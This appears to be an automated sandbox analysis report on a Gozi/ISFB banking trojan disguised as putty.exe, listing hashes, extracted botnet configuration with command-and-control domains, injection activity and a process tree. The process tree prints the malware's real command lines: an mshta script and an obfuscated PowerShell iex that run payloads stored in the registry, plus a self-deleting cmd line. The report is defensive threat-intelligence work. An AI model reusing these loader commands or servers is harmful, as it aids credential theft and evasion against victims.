gozi | 911bb31927c7250b4741063159cccf6549e4a28ce6b0a5043d3392c7fce401e4

Analysis

max time kernel
150s
max time network
157s
platform
windows10-1703_x64
resource
win10-20230831-en
resource tags

arch:x64arch:x86image:win10-20230831-enlocale:en-usos:windows10-1703-x64system
submitted
07-10-2023 05:03

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

putty.exe
Size

274KB
MD5

d18f3fecf6d28ddd0f4cf4a9b53c0aec
SHA1

05263b9ec69fcf48cc71443ba23545fabe21df12
SHA256

911bb31927c7250b4741063159cccf6549e4a28ce6b0a5043d3392c7fce401e4
SHA512

4629ce7f35716bd2c0fc3c14104251c6b2f3eaf07f7b35cf181654d6bc9be85bda6cb6f802b00f98c6bbb446db4790940605dcf8f8d6391282281ac029ff0512
SSDEEP

3072:utyJSwPI9F4BwVVO+kjH4wjyIphvo3ZDivScpBaa4l8QU:iyrPa4BI7wuIphg3ZDi6cnA8Q

Score

10^/10

gozi 5050 banker isfb trojan

Malware Config

Extracted

Family

gozi

Extracted

Family

gozi

Botnet

5050

mifrutty.com

Attributes

base_path
/jerry/
build
250260
exe_type
loader
extension
.bob
server_id
50

rsa_pubkey.plain

aes.plain

Extracted

Family

gozi

Botnet

5050

http://igrovdow.com

Attributes

base_path
/pictures/
build
250260
exe_type
worker
extension
.bob
server_id
50

rsa_pubkey.plain

aes.plain

Signatures

Gozi
Gozi is a well-known and widely distributed banking trojan.
banker trojan gozi

Suspicious use of SetThreadContext 6 IoCs

Processes:

powershell.exeExplorer.EXEcmd.exe

description	pid	process	target process
PID 2688 set thread context of 3136	2688	powershell.exe	Explorer.EXE
PID 3136 set thread context of 3688	3136	Explorer.EXE	RuntimeBroker.exe
PID 3136 set thread context of 208	3136	Explorer.EXE	cmd.exe
PID 3136 set thread context of 4144	3136	Explorer.EXE	WinMail.exe
PID 208 set thread context of 3240	208	cmd.exe	PING.EXE
PID 3136 set thread context of 3036	3136	Explorer.EXE	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

3240 PING.EXE
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

PING.EXE

pid process

3240 PING.EXE

pid	process
3240	PING.EXE

pid	process
3240	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

putty.exepowershell.exeExplorer.EXE

pid	process
3708	putty.exe
3708	putty.exe
2688	powershell.exe
2688	powershell.exe
2688	powershell.exe
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Explorer.EXE

pid process

3136 Explorer.EXE
Suspicious behavior: MapViewOfSection 6 IoCs

Processes:

powershell.exeExplorer.EXEcmd.exe

pid process

2688 powershell.exe
3136 Explorer.EXE
3136 Explorer.EXE
3136 Explorer.EXE
208 cmd.exe
3136 Explorer.EXE

pid	process
3136	Explorer.EXE

pid	process
2688	powershell.exe
3136	Explorer.EXE
3136	Explorer.EXE
3136	Explorer.EXE
208	cmd.exe
3136	Explorer.EXE

Suspicious use of AdjustPrivilegeToken 11 IoCs

Processes:

powershell.exeExplorer.EXE

description	pid	process
Token: SeDebugPrivilege	2688	powershell.exe
Token: SeShutdownPrivilege	3136	Explorer.EXE
Token: SeCreatePagefilePrivilege	3136	Explorer.EXE
Token: SeShutdownPrivilege	3136	Explorer.EXE
Token: SeCreatePagefilePrivilege	3136	Explorer.EXE
Token: SeShutdownPrivilege	3136	Explorer.EXE
Token: SeCreatePagefilePrivilege	3136	Explorer.EXE
Token: SeShutdownPrivilege	3136	Explorer.EXE
Token: SeCreatePagefilePrivilege	3136	Explorer.EXE
Token: SeShutdownPrivilege	3136	Explorer.EXE
Token: SeCreatePagefilePrivilege	3136	Explorer.EXE

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

Explorer.EXE

pid process

3136 Explorer.EXE

pid	process
3136	Explorer.EXE

Suspicious use of WriteProcessMemory 39 IoCs

Processes:

mshta.exepowershell.execsc.execsc.exeExplorer.EXEcmd.exe

description	pid	process	target process
PID 2528 wrote to memory of 2688	2528	mshta.exe	powershell.exe
PID 2528 wrote to memory of 2688	2528	mshta.exe	powershell.exe
PID 2688 wrote to memory of 2776	2688	powershell.exe	csc.exe
PID 2688 wrote to memory of 2776	2688	powershell.exe	csc.exe
PID 2776 wrote to memory of 32	2776	csc.exe	cvtres.exe
PID 2776 wrote to memory of 32	2776	csc.exe	cvtres.exe
PID 2688 wrote to memory of 3664	2688	powershell.exe	csc.exe
PID 2688 wrote to memory of 3664	2688	powershell.exe	csc.exe
PID 3664 wrote to memory of 3076	3664	csc.exe	cvtres.exe
PID 3664 wrote to memory of 3076	3664	csc.exe	cvtres.exe
PID 2688 wrote to memory of 3136	2688	powershell.exe	Explorer.EXE
PID 2688 wrote to memory of 3136	2688	powershell.exe	Explorer.EXE
PID 2688 wrote to memory of 3136	2688	powershell.exe	Explorer.EXE
PID 2688 wrote to memory of 3136	2688	powershell.exe	Explorer.EXE
PID 3136 wrote to memory of 3688	3136	Explorer.EXE	RuntimeBroker.exe
PID 3136 wrote to memory of 3688	3136	Explorer.EXE	RuntimeBroker.exe
PID 3136 wrote to memory of 3688	3136	Explorer.EXE	RuntimeBroker.exe
PID 3136 wrote to memory of 3688	3136	Explorer.EXE	RuntimeBroker.exe
PID 3136 wrote to memory of 208	3136	Explorer.EXE	cmd.exe
PID 3136 wrote to memory of 208	3136	Explorer.EXE	cmd.exe
PID 3136 wrote to memory of 208	3136	Explorer.EXE	cmd.exe
PID 3136 wrote to memory of 208	3136	Explorer.EXE	cmd.exe
PID 3136 wrote to memory of 208	3136	Explorer.EXE	cmd.exe
PID 208 wrote to memory of 3240	208	cmd.exe	PING.EXE
PID 208 wrote to memory of 3240	208	cmd.exe	PING.EXE
PID 208 wrote to memory of 3240	208	cmd.exe	PING.EXE
PID 3136 wrote to memory of 4144	3136	Explorer.EXE	WinMail.exe
PID 3136 wrote to memory of 4144	3136	Explorer.EXE	WinMail.exe
PID 3136 wrote to memory of 4144	3136	Explorer.EXE	WinMail.exe
PID 3136 wrote to memory of 4144	3136	Explorer.EXE	WinMail.exe
PID 208 wrote to memory of 3240	208	cmd.exe	PING.EXE
PID 3136 wrote to memory of 4144	3136	Explorer.EXE	WinMail.exe
PID 208 wrote to memory of 3240	208	cmd.exe	PING.EXE
PID 3136 wrote to memory of 3036	3136	Explorer.EXE	cmd.exe
PID 3136 wrote to memory of 3036	3136	Explorer.EXE	cmd.exe
PID 3136 wrote to memory of 3036	3136	Explorer.EXE	cmd.exe
PID 3136 wrote to memory of 3036	3136	Explorer.EXE	cmd.exe
PID 3136 wrote to memory of 3036	3136	Explorer.EXE	cmd.exe
PID 3136 wrote to memory of 3036	3136	Explorer.EXE	cmd.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3136

C:\Users\Admin\AppData\Local\Temp\putty.exe
"C:\Users\Admin\AppData\Local\Temp\putty.exe"
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3708

C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Fy8k='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Fy8k).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\CC07EBAB-BBA0-DE9E-A5C0-1FF2A9F4C346\\\MelodyPlay'));if(!window.flag)close()</script>"
2⤵
- Suspicious use of WriteProcessMemory
PID:2528

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name neabuvidpw -value gp; new-alias -name tlmeonms -value iex; tlmeonms ([System.Text.Encoding]::ASCII.GetString((neabuvidpw "HKCU:Software\AppDataLow\Software\Microsoft\CC07EBAB-BBA0-DE9E-A5C0-1FF2A9F4C346").HandlerMask))
3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2688

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4cuq5wwf\4cuq5wwf.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:2776

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC7DF.tmp" "c:\Users\Admin\AppData\Local\Temp\4cuq5wwf\CSCBAAA500B213C49AEA466F1E040B8614D.TMP"
5⤵
PID:32

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qwwwqc0d\qwwwqc0d.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:3664

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC8E9.tmp" "c:\Users\Admin\AppData\Local\Temp\qwwwqc0d\CSC6D1005624420432CA7AD7051C94DEFC3.TMP"
5⤵
PID:3076

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\putty.exe"
2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:208

C:\Windows\system32\PING.EXE
ping localhost -n 5
3⤵
- Runs ping.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:3240

C:\Program Files\Windows Mail\WinMail.exe
"C:\Program Files\Windows Mail\WinMail" OCInstallUserConfigOE
2⤵
PID:4144

C:\Windows\syswow64\cmd.exe
"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
2⤵
PID:3036

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3688

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Remote System Discovery

T1018

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\4cuq5wwf\4cuq5wwf.dll
Filesize
3KB

MD5
d41f60a4a766cbaa7c3cb3aa0749b988

SHA1
b1f042e547252490757998e1101465083aaef7fd

SHA256
8c858cddae2b2b921a05a758018b8a6166c8dea2a002f2f93ab3b8ad2cc7e127

SHA512
fd8b01dcabf050d3fc636d9bc086d8a5394e7df1da29a6d3ecfc377bd2f4519113919891d12fc388e31a174e97493d4fa51f837f3be973b4e8e826e9644867e4

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESC7DF.tmp
Filesize
1KB

MD5
2e11165cbf04f3f3a7b36b488848b745

SHA1
76ebb8b6895e33674764b99c9e89b0643b1f1f99

SHA256
d1169de81c43d4c41fb9b391c125c464b527f7ae05bef1888081e17302e87688

SHA512
40233bd9fb8906d32e836c4f70a06c1899b546aa23998e4d614b733c7c7cb2b4f7640f0a43e5c3ce183b3d1acbc7a2bcbff423cdc82e3c6f6d664c5a6d222ed6

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESC8E9.tmp
Filesize
1KB

MD5
9cbfb3f9d43179a691faf94bea4cd6d7

SHA1
c5ed876d45bd317ee0dbac37f4f02e2c15ff3f92

SHA256
f3390b30bfefef6746d54354fb2886406ceea55e3dd13601def6577479a387d2

SHA512
76f1b163ecd382fe41ccf55d5600f8a5f0feebaf5bd0dd2033e46fcb21413321efa690317548c191321a8af20ee3ef2e6c47d3532d1ce5bd90888c059d1c2080

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_uqtaga5v.eao.ps1
Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Local\Temp\qwwwqc0d\qwwwqc0d.dll
Filesize
3KB

MD5
d5dcb2d271109e21352e7e4577b5b287

SHA1
1aa59c42820bfa621be9c167e65923b15c5ff6d4

SHA256
9fb53b03b92b97be55ce10c319fe24341ffd233fe4fdd3e3dd1282e9ac7d002f

SHA512
c211d6a1b0ffa73ab6a2665cc7406fbdb1b9a3ca6079b268c5bfa97e57cd84843a0e5133a316568ff1a5bd56cd787848336b3237002c1af9aa2346f416da2d2d

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\4cuq5wwf\4cuq5wwf.0.cs
Filesize
405B

MD5
caed0b2e2cebaecd1db50994e0c15272

SHA1
5dfac9382598e0ad2e700de4f833de155c9c65fa

SHA256
21210b9baafb8b03ab0ef625312973a77bb5aba856c91892b65826e8b7c3b150

SHA512
86dc4f8cedd37464c9c492c467375d4603715e5827dfaf7bfcfe5c46ce5e09b439139d4b0a756afa37e4c2444c5b169ac1c024217b9ba449edb183a3b53f2b62

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\4cuq5wwf\4cuq5wwf.cmdline
Filesize
369B

MD5
a4a3f15e3de652e1cdd30ba3e735e3f6

SHA1
ec5f479db7bada63600165bc67a78fe0da2356bd

SHA256
0aee2a709c6b1fd81d700b92efca43e424a0bcc373aa4bf4e177c2fcfbbadbba

SHA512
ebff469ee3e4cc8e6828a87e50015d26c5d952ce6fd6e8437d56a1d503987fe6ee96e54d9ea891bfd26cf4d50b08312a914ef38a37fa793b47c26dce31c49cc8

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\4cuq5wwf\CSCBAAA500B213C49AEA466F1E040B8614D.TMP
Filesize
652B

MD5
7fd83d1bb5b88b4fb8430a4d669a8d48

SHA1
c6e9b9808cdabbe8c79cfbc6f1f073c1e45034f4

SHA256
e5299bc8c3f142f89cd50d1a25b2424186e26709cfddbb81b1b19a8518830192

SHA512
19775a417cabc254eb76594dea4e8790138bcc8f2bbe15e6d6a18353d2cd1b1fb6d9dd7f53f2605718f7db28e3b879291694626ca1b532e009dc6d47dfda652b

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\qwwwqc0d\CSC6D1005624420432CA7AD7051C94DEFC3.TMP
Filesize
652B

MD5
aea1b6eb34152d17631c3c706716d841

SHA1
b56a7520c9171cb2296faef94e23d04eeb268c7e

SHA256
5efbdb8a98fc141691b394bb846e869996c82de90149eabf9ab16a6e347d09cb

SHA512
6059c90419301029eb056faa0b6336f76bcccb8d13de15a0a2c66efa7abc94003d45649caff3ad2bc6a5d5946af9ad69d800bff515a09621048c7530a820730e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\qwwwqc0d\qwwwqc0d.0.cs
Filesize
406B

MD5
ca8887eacd573690830f71efaf282712

SHA1
0acd4f49fc8cf6372950792402ec3aeb68569ef8

SHA256
568b0c1155379c88e91f904f4e70a3608fbf664ef890309cd705a7c5eb3232c3

SHA512
2a538a308db6c7d09224737f549d442b4c206e8e9605a2570149243ee11bf0c5f028ebf003b383f86709d0dd976ff66d15ccb700f50969ff3da64dd39cab25c7

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\qwwwqc0d\qwwwqc0d.cmdline
Filesize
369B

MD5
3491ed5d20404ea111b9f6fb2297f9af

SHA1
b7b8f67efb3b036cde0a984f6f7bf63d493155c2

SHA256
fd2ff904cc59b43c2a13ca95fbeeade4a77bf9e2aee976f1f644975af865ce50

SHA512
14c37090c2331a73417c2d96db0053d81163f6f7dc1e9cb67213069e6738f20da5085dbd9317068b6669bc4874193724d98783329153c2188f4a5ee6a747361c

Download Submit
memory/208-109-0x0000018A26640000-0x0000018A26641000-memory.dmp

Filesize
4KB

Download
memory/208-147-0x0000018A26980000-0x0000018A26A24000-memory.dmp

Filesize
656KB

Download
memory/208-108-0x0000018A26980000-0x0000018A26A24000-memory.dmp

Filesize
656KB

Download
memory/2688-28-0x00000277F1450000-0x00000277F14C6000-memory.dmp

Filesize
472KB

Download
memory/2688-25-0x00000277F1190000-0x00000277F11A0000-memory.dmp

Filesize
64KB

Download
memory/2688-22-0x00007FF9D9D20000-0x00007FF9DA70C000-memory.dmp

Filesize
9.9MB

Download
memory/2688-24-0x00000277F12A0000-0x00000277F12C2000-memory.dmp

Filesize
136KB

Download
memory/2688-59-0x00000277F1410000-0x00000277F1418000-memory.dmp

Filesize
32KB

Download
memory/2688-23-0x00000277F1190000-0x00000277F11A0000-memory.dmp

Filesize
64KB

Download
memory/2688-94-0x00000277F15D0000-0x00000277F160D000-memory.dmp

Filesize
244KB

Download
memory/2688-77-0x00000277F15D0000-0x00000277F160D000-memory.dmp

Filesize
244KB

Download
memory/2688-75-0x00000277F1190000-0x00000277F11A0000-memory.dmp

Filesize
64KB

Download
memory/2688-73-0x00000277F1430000-0x00000277F1438000-memory.dmp

Filesize
32KB

Download
memory/2688-93-0x00007FF9D9D20000-0x00007FF9DA70C000-memory.dmp

Filesize
9.9MB

Download
memory/3036-138-0x0000000000150000-0x0000000000151000-memory.dmp

Filesize
4KB

Download
memory/3036-137-0x0000000000790000-0x0000000000828000-memory.dmp

Filesize
608KB

Download
memory/3036-143-0x0000000000790000-0x0000000000828000-memory.dmp

Filesize
608KB

Download
memory/3136-144-0x0000000002530000-0x00000000025D4000-memory.dmp

Filesize
656KB

Download
memory/3136-79-0x0000000002530000-0x00000000025D4000-memory.dmp

Filesize
656KB

Download
memory/3136-80-0x0000000000530000-0x0000000000531000-memory.dmp

Filesize
4KB

Download
memory/3240-119-0x00000133D4E00000-0x00000133D4EA4000-memory.dmp

Filesize
656KB

Download
memory/3240-123-0x00000133D4B00000-0x00000133D4B01000-memory.dmp

Filesize
4KB

Download
memory/3240-146-0x00000133D4E00000-0x00000133D4EA4000-memory.dmp

Filesize
656KB

Download
memory/3688-96-0x0000019A607A0000-0x0000019A60844000-memory.dmp

Filesize
656KB

Download
memory/3688-145-0x0000019A607A0000-0x0000019A60844000-memory.dmp

Filesize
656KB

Download
memory/3688-97-0x0000019A5E1E0000-0x0000019A5E1E1000-memory.dmp

Filesize
4KB

Download
memory/3708-4-0x0000000002320000-0x000000000232D000-memory.dmp

Filesize
52KB

Download
memory/3708-3-0x0000000000400000-0x000000000228B000-memory.dmp

Filesize
30.5MB

Download
memory/3708-2-0x00000000022F0000-0x00000000022FB000-memory.dmp

Filesize
44KB

Download
memory/3708-7-0x0000000002410000-0x0000000002510000-memory.dmp

Filesize
1024KB

Download
memory/3708-8-0x0000000000400000-0x000000000228B000-memory.dmp

Filesize
30.5MB

Download
memory/3708-1-0x0000000002410000-0x0000000002510000-memory.dmp

Filesize
1024KB

Download
memory/3708-9-0x00000000022F0000-0x00000000022FB000-memory.dmp

Filesize
44KB

Download
memory/4144-118-0x000001C7C8BB0000-0x000001C7C8C54000-memory.dmp

Filesize
656KB

Download
memory/4144-132-0x000001C7C8BB0000-0x000001C7C8C54000-memory.dmp

Filesize
656KB

Download
memory/4144-120-0x000001C7C8B80000-0x000001C7C8B81000-memory.dmp

Filesize
4KB

Download